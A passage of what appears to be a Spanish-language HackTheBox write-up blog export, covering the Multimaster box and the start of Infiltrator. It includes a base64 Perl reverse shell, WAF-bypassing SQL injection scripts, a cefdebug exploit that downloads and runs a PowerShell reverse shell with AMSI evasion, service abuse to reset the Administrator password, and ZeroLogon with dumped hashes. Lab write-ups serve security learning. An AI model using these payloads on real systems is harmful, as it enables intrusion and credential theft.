cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTAuMTAuMTQuMiI7JHA9OTk5OTtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL2Jhc2ggLWkiKTt9OycK | base64 -d > reverse.sh ``` Configuramos la reverse shell con el puerto y la ip de mi kali para enviar la reverse shell directo. ![Image](image-56.png) PWNED! ![Image](image-54.png) ![Image](redis-excalidraw.png)"},{"id":"multimaster","title":"HTB - Multimaster","description":"HTB - Multimaster","date":"2025-06-16T16:17:34.000Z","tags":["HackTheBox","Insane","Active-Directory","rpcclient","wfuzz","SQLi","Bypass-WAF","ASREPRoasting","decrypt","crack","password-spraying","lateral-movement","pivoting","kerberoast","debug","GenericWrite","DACL","sc","cefdebug","CVE-2019-1414","CVE-2020-1472"],"authors":["r4cc0x"],"url":"/blog/multimaster","content":"## Box Info | Name | Multimaster | | :-------------------- | ---------------: | | Release Date | 07 Mar, 2020 | | OS | Windows | | Rated Difficulty | Insane | ```zsh ping -c 3 10.10.10.179 PING 10.10.10.179 (10.10.10.179) 56(84) bytes of data. 64 bytes from 10.10.10.179: icmp_seq=1 ttl=127 time=161 ms 64 bytes from 10.10.10.179: icmp_seq=2 ttl=127 time=129 ms 64 bytes from 10.10.10.179: icmp_seq=3 ttl=127 time=127 ms ``` ## Recon Realizamos un reconocimiento con nmap para ver que puertos estan abiertos. ```zsh > sudo nmap -p- --open --min-rate 5000 -n -vv -Pn 10.10.10.179 -oG allPorts > nmap -sCV -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,3389,5985,9389,47001,49664,49665,49666,49668,49671,49674,49675,49678,49688,49698,49739 10.10.10.179 -oN targeted PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: MegaCorp 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-08 09:44:29Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGACORP) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2025-07-08T09:37:04 |_Not valid after: 2055-07-08T09:37:04 | ms-sql-info: | 10.10.10.179:1433: | Version: | name: Microsoft SQL Server 2017 RTM | number: 14.00.1000.00 | Product: Microsoft SQL Server 2017 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 |_ssl-date: 2025-07-08T09:45:36+00:00; +7m00s from scanner time. | ms-sql-ntlm-info: | 10.10.10.179:1433: | Target_Name: MEGACORP | NetBIOS_Domain_Name: MEGACORP | NetBIOS_Computer_Name: MULTIMASTER | DNS_Domain_Name: MEGACORP.LOCAL | DNS_Computer_Name: MULTIMASTER.MEGACORP.LOCAL | DNS_Tree_Name: MEGACORP.LOCAL |_ Product_Version: 10.0.14393 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2025-07-08T09:45:36+00:00; +7m00s from scanner time. | rdp-ntlm-info: | Target_Name: MEGACORP | NetBIOS_Domain_Name: MEGACORP | NetBIOS_Computer_Name: MULTIMASTER | DNS_Domain_Name: MEGACORP.LOCAL | DNS_Computer_Name: MULTIMASTER.MEGACORP.LOCAL | DNS_Tree_Name: MEGACORP.LOCAL | Product_Version: 10.0.14393 |_ System_Time: 2025-07-08T09:45:25+00:00 | ssl-cert: Subject: commonName=MULTIMASTER.MEGACORP.LOCAL | Not valid before: 2025-07-07T09:36:33 |_Not valid after: 2026-01-06T09:36:33 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49675/tcp open msrpc Microsoft Windows RPC 49678/tcp open msrpc Microsoft Windows RPC 49688/tcp open msrpc Microsoft Windows RPC 49698/tcp open msrpc Microsoft Windows RPC 49739/tcp open msrpc Microsoft Windows RPC Service Info: Host: MULTIMASTER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: MULTIMASTER | NetBIOS computer name: MULTIMASTER\\x00 | Domain name: MEGACORP.LOCAL | Forest name: MEGACORP.LOCAL | FQDN: MULTIMASTER.MEGACORP.LOCAL |_ System time: 2025-07-08T02:45:28-07:00 | smb2-time: | date: 2025-07-08T09:45:29 |_ start_date: 2025-07-08T09:36:41 |_clock-skew: mean: 1h07m00s, deviation: 2h38m46s, median: 6m59s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required ``` Agregamos el nombre de dominio para mapearlo a la direccion IP, para que resuelva el dominio localmente. - **DOMAIN NAME : MEGACORP.LOCAL** ```bash echo \"10.10.10.179 MEGACORP.LOCAL\" | sudo tee -a /etc/hosts ``` Enumeramos Tecnologias que maneja la Web con **WhatWeb** hace lo mismo que la extension Wappalyzer . ```bash whatweb http://10.10.10.179 http://10.10.10.179 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.10.179], Microsoft-IIS[10.0], Script, Title[MegaCorp], X-Powered-By[ASP.NET], X-UA-Compatible[IE=edge] ``` Con netexec y smb podemos obtener mayor informacion sobre la maquina como hostname, version del SO y el nombre de dominio. ```python nxc smb 10.10.10.179 --shares SMB 10.10.10.179 445 MULTIMASTER [*] Windows 10 / Server 2016 Build 14393 x64 (name:MULTIMASTER) (domain:MEGACORP.LOCAL) (signing:True) (SMBv1:True) SMB 10.10.10.179 445 MULTIMASTER [-] Error enumerating shares: STATUS_USER_SESSION_DELETED ``` Tambien podemos enumerar el los archivos compartidos por SMB con null session. ```zsh smbclient -L //multimaster.htb/ -N ``` ```zsh smbmap -H 10.10.10.179 --no-banner [*] Detected 1 hosts serving SMB [*] Established 1 SMB connections(s) and 0 authenticated session(s) [!] Access denied on 10.10.10.179, no fun for you... [*] Closed 1 connections ``` Lo mismo para RPC, enumerar usuarios con null sesion. ```zsh rpcclient -U '' 10.10.10.179 -N rpcclient $> querydispinfo result was NT_STATUS_ACCESS_DENIED rpcclient $> enumdomusers result was NT_STATUS_ACCESS_DENIED rpcclient $> ``` Enumeracion por transferencia de zona DNS (AXFR) ```zsh dig @10.10.10.179 megacorp.local ``` Enumerando un poco el sitio web, tenemos un buscador de `Colleague Finder` y si buscamos por una letra aparecen algunos nombres (posibles usuarios), guardaremos estos nombres para seguir enumerando. ![Image](image.png) ```zsh cat users | grep megacorp | sed 's/@megacorp.htb//' | sponge users ``` ```dtd sbauer okent ckane kpage james rmartin jorden alyx ilee nbourne zpowers aldom egre55 ``` ### ASREP Roast | Enum users Con el ataque de ASREP Roast podemos identificar usuarios sin el kerberos pre-authentication (`UF_DONT_REQUIRE_PREAUTH`). Esto nos permite obtener un TGT (Ticket Granting Ticket) sin proveer credenciales. ```zsh impacket-GetNPUsers MEGACORP.LOCAL/ -no-pass -usersfile users Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] User sbauer doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User okent doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User ckane doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User kpage doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User rmartin doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User jorden doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User alyx doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User ilee doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User nbourne doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User zpowers doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User aldom doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) ``` ## Kerbrute Con kerbrute enumeramos los usuarios validos que se encuentran en el dominio. ```zsh kerbrute userenum --dc 10.10.10.179 -d MEGACORP.LOCAL users ``` ```dtd 2025/07/08 04:08:59 > [+] VALID USERNAME: ckane@MEGACORP.LOCAL 2025/07/08 04:08:59 > [+] VALID USERNAME: okent@MEGACORP.LOCAL 2025/07/08 04:08:59 > [+] VALID USERNAME: sbauer@MEGACORP.LOCAL 2025/07/08 04:08:59 > [+] VALID USERNAME: kpage@MEGACORP.LOCAL 2025/07/08 04:08:59 > [+] VALID USERNAME: rmartin@MEGACORP.LOCAL 2025/07/08 04:08:59 > [+] VALID USERNAME: james@MEGACORP.LOCAL 2025/07/08 04:08:59 > [+] VALID USERNAME: nbourne@MEGACORP.LOCAL 2025/07/08 04:08:59 > [+] VALID USERNAME: ilee@MEGACORP.LOCAL 2025/07/08 04:08:59 > [+] VALID USERNAME: alyx@MEGACORP.LOCAL 2025/07/08 04:08:59 > [+] VALID USERNAME: jorden@MEGACORP.LOCAL 2025/07/08 04:08:59 > [+] VALID USERNAME: zpowers@MEGACORP.LOCAL 2025/07/08 04:08:59 > [+] VALID USERNAME: aldom@MEGACORP.LOCAL 2025/07/08 04:08:59 > Done! Tested 13 usernames (12 valid) in 0.253 seconds ``` ## SQLi in Colleague Finder Sin pistas intentaremos interceptar la peticion que mandamos al `Colleague Finder` con BurpSuite. ![Image](image-1.png) Podemos ver que se envia una peticion en formato JSON. ![Image](image-2.png) Inmediatamente con la entrada JSON, intente realizar una prueba rapida con sql injection. Por ejemplo con una comilla simple `{\"name\":\"'\"}` obtuve 403 Forbidden: Acces Denied. Podria ser que detras del servidor web se encuentre un WAF (Web Application Firewall) que impide los intentos de inyeccion SQL. ![Image](image-3.png) Probe con fuerza bruta para enviar multiples consultas para saber que caracteres permitia pero me topaba con el WAF que impedia que realizara consultas. Modifique el comando para que se enviaran con un intervalo de tiempo junto con el `Content-Type` y escondiendo los estados 200: ```zsh wfuzz -c -X POST --hc=200 -H \"Content-Type: application/json;charset=utf-8\" -s 1 -w /usr/share/seclists/Fuzzing/special-chars.txt -d '{\"name\":\"FUZZ\"}' http://10.10.10.179/api/getColleagues ``` ![Image](image-4.png) El caracter `\\` escape es el unico que no esta prohibido y es el que obtengo un 500 Internal Server Error que indica un SQLi ![[Pasted image 20250708042744.png]] ### Bypassing WAF with JSON Unicode Escape [bypassing-wafs-with-json-unicode-escape-sequences](https://trustfoundry.net/2018/12/20/bypassing-wafs-with-json-unicode-escape-sequences/) Podriamos utilizar como ejemplo los tamper de sqlmap (`locate tamper | grep -v __pycache__`) para poder utilizarlos y bypassear el WAF `charsunicodeescape.py` ![Image](image-5.png) ```python #!/usr/bin/python3 from pwn import * import requests, pdb, signal, time, json def def_handler(sig, frame): print(\"*\\n\\n[+] Exit.. \\n\") sys.exit(1) #Ctrl+x signal.signal(signal.SIGINT, def_handler) #Var Global main_url = \"http://10.10.10.179/api/getColleagues\" def getUnicode(sqli): sqli_modified = \"\" for character in sqli: sqli_modified += \"\\\\u00\" + hex(ord(character))[2::] return sqli_modified def makeRequest(sqli_modified): headers = { 'Content-Type' : 'application/json;charset=utf-8' } post_data = '{\"name\":\"%s\"}' % sqli_modified r = requests.post(main_url, headers=headers, data=post_data) data_json = json.loads(r.text) return (json.dumps(data_json, indent=4)) if __name__ == '__main__': while True: sqli = input(\"> \") sqli = sqli.strip() sqli_modified = getUnicode(sqli) response_json = makeRequest(sqli_modified) print(response_json) ``` >Con CyberChef se puede obtener el mismo resultado haciendo el encode a `Escape Unicode Characters` con el prefix `\\u` y enviando solicitudes por BurpSuite. ### Enum Database ```sql ' order by 6-- - null ' order by 5-- - {SNIP..} test' union select 1,2,3,4,5-- - ``` ![Image](image-6.png) ```sql a' union select 1,db_name(),3,4,5-- - a' union select 1,schema_name,3,4,5 from information_schema.schemata-- - a' union select 1,2,table_name,4,5 from information_schema.tables where table_schema='dbo'-- - ``` ![Image](image-7.png) ```sql a' union select 1,2,column_name,4,5 from information_schema.columns where table_schema='dbo' and table_name='Logins'-- - ``` ![Image](image-8.png) Ahora podemos dumpear la informacion de username y password, para posteriormemte crackear los hashes y enumerar que credenciales son validas. ```sql a' union select 1,username,password,4,5 from Logins-- - ``` ![Image](image-9.png) Hacemos un ajuste de formato para quedarnos con el nombre y el hash para poder crackear los hashes y no tener algun incoveniente con john o hashcat. ```bash cat hash | grep -E \"position|name\" | sed 's/^ *//' | awk 'NF{print $NF}' | tr -d '\"' | tr -d ',' | paste -d \" \" - - | tr ' ' ':' > hash ``` ![Image](image-10.png) Con john no pudimos romperlas pero posiblemente con hashcat si se pueda lograr pero para eso necesitamos saber el tipo de hash con `hash-identifier`, vemos que es un ``SHA-384`` , con hashcat podemos listar los modos de ese tipo de hash. ![Image](image-11.png) ```zsh hashcat --example-hashes | grep \"\\-384\" ``` ![Image](image-12.png) Podriamos intentar con cada uno hasta lograr romper alguno. ```zsh hashcat --example-hashes | grep \"\\-384\" -B 4 ``` ![Image](image-13.png) Intentare romper sin la maquina virtual, es decir usare la grafica para poder usar todo el poder e ir un poco mas rapido ```zsh ./hashcat.exe -m 17900 -a 0 hash rockyou.txt --user ``` Obtuvimos 3 contraseñas, ya tenemos un listado para validar credenciales. ![Image](image-14.png) ```dtd password1 finance1 banking1 ``` Se intento hacer un `password spraying` pero ninguna credencial era valida. ## SQL - Enumerating Domain Accounts En SQL podemos enumerar mediante funciones usuarios y grupos de un Dominio de Directorio Activo. [hacking-sql-server-procedures-part-4-enumerating-domain-accounts](https://www.netspi.com/blog/technical-blog/network-pentesting/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/) ```sql a' union select 1,default_domain(),3,4,5-- - a' union select 1,(select SUSER_SID('MEGACORP\\Administrator')),3,4,5-- - ``` Ahora como se describe en el articulo usaremos la funcion \"``SUSER_SID``\" para obtener el RID de Administrator. ```sql a' union select 1,(select sys.fn_varbintohexstr(SUSER_SID('MEGACORP\\Administrator'))),3,4,5-- - ``` ``` { \"id\": 1, \"name\": \"0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000\", \"position\": \"3\", \"email\": \"4\", \"src\": \"5\" } ``` Verificamos que RID sea del Administrator. Al proporcionar un RID completo a la función \"SUSER_SNAME\", esta devuelve el nombre de la cuenta, grupo o equipo del dominio asociado. ```sql a' union select 1,(select SUSER_SNAME(0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000)),3,4,5-- - ``` ![Image](image-15.png) > En Active Directory, cada usuario, grupo y equipo tiene un identificador único llamado RID. Similar al principal_id, el RID es otro número que se asigna incrementalmente a los objetos del dominio. > El RID son los 8 ultimos digitos (`f4010000`) y el SID es el resto que es estatico (`0x0105000000000005150000001c00d1bcd181f1492bdfc236`). ```python #!/usr/bin/python3 from pwn import * import requests, pdb, signal, time, json, sys def def_handler(sig, frame): print(\"*\\n\\n[+] Exit.. \\n\") sys.exit(1) #Ctrl+x signal.signal(signal.SIGINT, def_handler) main_url = \"http://10.10.10.179/api/getColleagues\" #Static Var sid = \"0x0105000000000005150000001c00d1bcd181f1492bdfc236\" def getUnicode(sqli): sqli_modified = \"\" for character in sqli: sqli_modified += \"\\\\u00\" + hex(ord(character))[2::] return sqli_modified def makeRequest(sqli_modified): headers = { 'Content-Type' : 'application/json;charset=utf-8' } post_data = '{\"name\":\"%s\"}' % sqli_modified r = requests.post(main_url, headers=headers, data=post_data) data_json = json.loads(r.text) return (json.dumps(data_json, indent=4)) def getRID(rid): rid_hex = hex(rid).replace('x', '') list = [] for character in rid_hex: list.append(character) rid = list[2] + list[3] + list[0] + list[1] + \"0000\" return rid if __name__ == '__main__': for x in range(1100, 1200): rid = getRID(x) sqli = \"a' union select 1,(select SUSER_SNAME(%s%s)),3,4,5-- -\" % (sid, rid) sqli_modified = getUnicode(sqli) response_json = makeRequest(sqli_modified) print(response_json) time.sleep(1) ``` ![Image](image-16.png) > Con este script tambien se puede iterar o enumerar usuarios. > https://github.com/Keramas/mssqli-duet Guardamos la request del BurpSuite ```zsh mssqli-duet.py -p 'name' -i \"a'\" -e unicode -r request.txt -rid 1000-1200 -t 3 ``` ```zsh MEGACORP\\\\tushikitatomo MEGACORP\\\\andrew MEGACORP\\\\lana ``` Ahora tenemos 3 usuarios nuevos que intentaremos de nuevo hacer un Password Spraying ### Password Spraying ```bash nxc smb 10.10.10.179 -u users -p passwords --continue-on-success ``` ![Image](image-17.png) ```d tushikikatomo:finance1 ``` Con esas nuevas credenciales validaremos si tenemos acceso a una shell con WinRm. ![Image](image-18.png) ## Priv: Lateral Movement - tushikikamoto -> cyork ```powershell Get-Process ``` ![Image](image-19.png) Podemos identificar que se esta ejecutando Code lo que me hace pensar que es Visual Studio Code, podriamos verificar la version del VSCode. `C:\\Program Files\\Microsoft VS Code\\bin` ![Image](image-20.png) Version 1.37.1 - CVE-2019-1414 (An elevation of privilege vulnerability exists in Visual Studio Code when it exposes a debug listener to users of a local computer, aka 'Visual Studio Code Elevation of Privilege Vulnerability') [Github - cve-2019-1414](https://github.com/qazbnm456/awesome-cve-poc?tab=readme-ov-file#cve-2019-1414) ### CEF Debugging (CVE-2019-1414) [Github - cefdebug](https://github.com/taviso/cefdebug) Ejecutaremos el cefdebug.exe para que realize un escaneo y verifique servidores que se encuentran abiertos que parecen ser CEF Debuggers. ```powershell .\\cefdebug.exe ``` ![Image](image-21.png) Con **CEFdebug** podemos utilizar la opcion ``--code`` junto con la lista que nos permite la ejecucion de comandos ```powershell .\\cefdebug.exe --url ws://127.0.0.1:22007/55a9c205-f376-4be7-a2fb-70d117d5bfe9 --code \"process.version\" ``` ![Image](image-22.png) Ahora como PoC nos enviaremos un ping para verificar que podemos establecer una reverse shell con los scripts de Nishang que estaremos utilizando. ```powershell .\\cefdebug.exe --url ws://127.0.0.1:22007/55a9c205-f376-4be7-a2fb-70d117d5bfe9 --code \"proc ess.mainModule.require('child_process').exec('ping -n 2 10.10.14.20')\" ``` ![Image](image-23.png) [Invoke-PowerShellTcp.ps1](https://raw.githubusercontent.com/tokyoneon/Chimera/refs/heads/master/shells/Invoke-PowerShellTcp.ps1) ```powershell .\\cefdebug.exe --url ws://127.0.0.1:22007/55a9c205-f376-4be7-a2fb-70d117d5bfe9 --code \"proc ess.mainModule.require('child_process').exec('iex (iwr http://10.10.14.20/Invoke-PowerShellTcp.ps1 -UseBasicParsing)')\" ``` Probablemente se encuentre el AV que hace que no pueda descargar el archivo, intentare cambiando algunas variables dentro del archivo `Invoke-PowerShellTcp.ps1` para poder evitar que nos detecte el AMSI. Eliminamos comentarios y cambiamos el nombre de la funcion \"Invoke-PowerShellTCP\" a \"psrs\". ```powershell :%s/Invoke-PowerShellTcp/psrs ``` Para saber si aun con los cambios funciona el script \"Invoke-PowerShellTcp.ps1\" podemos ejecutar solo el comando `iex (New-Object Net.WebClient).downloadString('http://10.10.14.20/Invoke-PowerShellTcp.ps1')` en la maquina de tushikikamoto, si ganamos una shell es que el comando y el archivo funcionan correctamente. Pero sige sin darme una shell, para que sea menos detectable por el AMSI, vamos a codificar en Base64 de Windows el comando. ```zsh echo -n \"iex (New-Object Net.WebClient).downloadString('http://10.10.14.20/Invoke-PowerShellTcp.ps1')\" | iconv -t utf-16le | base64 -w 0; echo ``` > Si llegas a tener problemas a veces tienes que volver a ejecutar el `.\\cefdebug` para cambiar el url (cef debug) ```powershell .\\cefdebug.exe --url \"ws://127.0.0.1:16523/7cf4e24c-fcdf-4233-899a-8688d59d6994\" --code \"process.mainModule.require('child_process').exec('powershell -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8ASQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAC4AcABzADEAJwApAA==')\" ``` ![Image](image-24.png) Vemos que el usuario cyork es el que esta ejecutando el code y tambien vemos que es parte del grupo `DEVELOPERS` ![Image](image-25.png) ## Priv: Lateral Movement - cyork -> sbauer Como somos parte del grupo Developers, probablemente tendriamos acceso al directorio inetpub, recordemos que se utiliza para almacernar archivos relacionados con IIS, el servidor de web de Microsoft. `inetpub` ![Image](image-26.png) Encontramos un archivo .dll muy peculiar con el nombre de la maquina. ```powershell -a---- 1/9/2020 4:13 AM 13824 MultimasterAPI.dll ``` ### File Transfer via Smb - kali ```zsh home/kali/Documents/HTB/APT/IOXIDResolver/.env/bin/smbserver.py smbFolder $(pwd) -smb2support ``` - victim ```powershell copy MultimasterAPI.dll \\\\10.10.14.20\\smbFolder ``` Con `Strings` podemos extraer cadenas de caracteres imprimibles de archivos binarios o de otro tipo de archivos que no son de texto plano. ```zsh strings MultimasterAPI.dll ``` ![Image](image-27.png) ![Image](image-28.png) ```zsh strings -e b MultimasterAPI.dll ``` ![Image](image-29.png) ```dtd sbauer:D3veL0pM3nT! ``` >Se puede lograr el mismo resultado haciendo debug el binario con **dnSpy**. ### Password Spraying ![Image](image-30.png) #### Validate Credentials ```zsh nxc winrm 10.10.10.179 -u sbauer -p 'D3veL0pM3nT!' ``` ![Image](image-31.png) ### Evil-WinRM | sbauer ![Image](image-32.png) `net user sbauer` ![Image](image-33.png) En este punto ya no obtendriamos nada interesante debido que el usuario sbauer no se encuentra en ningun otro grupo interesante. ## BloodHound Ahora toca enumerar el dominio entero a traves de la herramienta `bloodhound-python`. El comando nos creara un archivo zip que contendra la informacion del dominio, lo que nos mostrara con bloodhound posibles vectores de ataque para escalar privilegios. ```zsh bloodhound-python -d MEGACORP.LOCAL -u sbauer -p 'D3veL0pM3nT!' -ns 10.10.10.179 --zip -c All ``` El usuario sbauer dispone de privilegios `GenericWrite` sobre el usuario jorden ![Image](image-34.png) ## Priv: Lateral Movement - sbauer - > jorden ### DACL (Mis) Configurations - Targeted Kerberoast #### Method 1 >`sudo ntpdate 10.10.10.179` ```zsh python3 targetedKerberoast.py -u \"sbauer\" -p 'D3veL0pM3nT!' -d \"MEGACORP.LOCAL\" --dc-ip 10.10.10.179 ``` ![Image](image-35.png) #### Method 2 [bloodyAD - Wiki](https://github.com/CravateRouge/bloodyAD/wiki/User-Guide) ```zsh bloodyAD --host 10.10.10.179 -d megacorp.local -u 'sbauer' -p 'D3veL0pM3nT!' add uac 'jorden' -f DONT_REQ_PREAUTH ``` ```zsh impacket-GetNPUsers MEGACORP.LOCAL/ -no-pass -usersfile users ``` ![Image](image-36.png) ### Crack Hash ```zsh john hashJorden --wordlist=/usr/share/wordlists/rockyou.txt ``` ![Image](image-37.png) ```dtd rainforest786 ``` ### Validate Credentials ```zsh nxc winrm 10.10.10.179 -u jorden -p 'rainforest786' ``` ![Image](image-38.png) ![Image](image-39.png) Ahora tenemos un usuario (**jorden**) en el grupo `SERVER OPERATOR` [windows-privilege-escalation-server-operator-group](https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/) ![Image](image-40.png) [syntax-security_groups](https://ss64.com/nt/syntax-security_groups.html) Usaremos la herramienta ``sc.exe`` que se utiliza para administrar servicios, como inciar, detener, pausar, reanudar y configurar servicios. ```powershell sc.exe config browser binPath=\"C:\\Windows\\system32\\cmd.exe /c net user Administrator P@ssword123!\" ``` Ahora paramos el servicio de browser `sc.exe stop browser` y lo volvemos a inciar para que los ajustes que configuramos surtan efecto `sc.exe start browser`. Validamos que el cambio de contraseña se haya hecho, validando las credenciales. ![Image](image-41.png) ```zsh evil-winrm -i 10.10.10.179 -u 'Administrator' -p 'P@ssword123!' ``` ![Image](image-42.png) ## ZeroLogon - CVE-2020-1472 [CVE-2020-1472](https://github.com/dirkjanm/CVE-2020-1472) ```zsh > python3 cve-2020-1472-exploit.py MULTIMASTER 10.10.10.179 Performing authentication attempts... ====================================================================== Target vulnerable, changing account password to empty string Result: 0 Exploit complete! > secretsdump.py -no-pass -just-dc MULTIMASTER\\$@10.10.10.179 Impacket v0.9.22.dev1+20200915.115225.78e8c8e4 - Copyright 2020 SecureAuth Corporation [*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:69cbf4a9b7415c9e1caf93d51d971be0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:06e3ae564999dbad74e576cdf0f717d3::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: MEGACORP.LOCAL\\svc-nas:1103:aad3b435b51404eeaad3b435b51404ee:fe90dcf97ce6511a65151881708d6027::: ...[snip]... ```"},{"id":"infiltrator","title":"HTB - Infiltrator","description":"HTB - Infiltrator","date":"2025-06-16T16:17:34.000Z","tags":["HackTheBox","ASREP Roasting","Active Directory","kerbrute","john","RDP","rpc","password spraying","bloodhound","OU","shadow credentials","AddSelf","ForceChangePassword","TGT","Output Messenger","Pivoting","Output Wall","Decrypting","DB","database","API","RCE","wireshark","BitLocker","hashcat","NTDS","ReadGMSAPassword","gMSADumper","ESC4","ADCS","Insane"],"authors":["r4cc0x"],"url":"/blog/infiltrator","content":"## Box Info | Name | Infiltrator | | :-------------------- | ---------------: | | Release Date | 31 Aug, 2024 | | OS | Windows | | Rated Difficulty | Insane | Lanzamos un ping para identificar si la maquina esta activa. ![Image](image.png) - Maquina Windows (ttl = 127) - whatweb ![Image](image-1.png) ## Recon - Nmap ```python PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Infiltrator.htb |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-15 23:36:41Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-15T23:38:22+00:00; -3h45m51s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 |_ssl-date: 2025-06-15T23:38:22+00:00; -3h45m50s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-15T23:38:22+00:00; -3h45m51s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-15T23:38:22+00:00; -3h45m50s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: INFILTRATOR | NetBIOS_Domain_Name: INFILTRATOR | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: infiltrator.htb | DNS_Computer_Name: dc01.infiltrator.htb | DNS_Tree_Name: infiltrator.htb | Product_Version: 10.0.17763 |_ System_Time: 2025-06-15T23:37:37+00:00 | ssl-cert: Subject: commonName=dc01.infiltrator.htb | Not valid before: 2025-06-03T14:17:24 |_Not valid after: 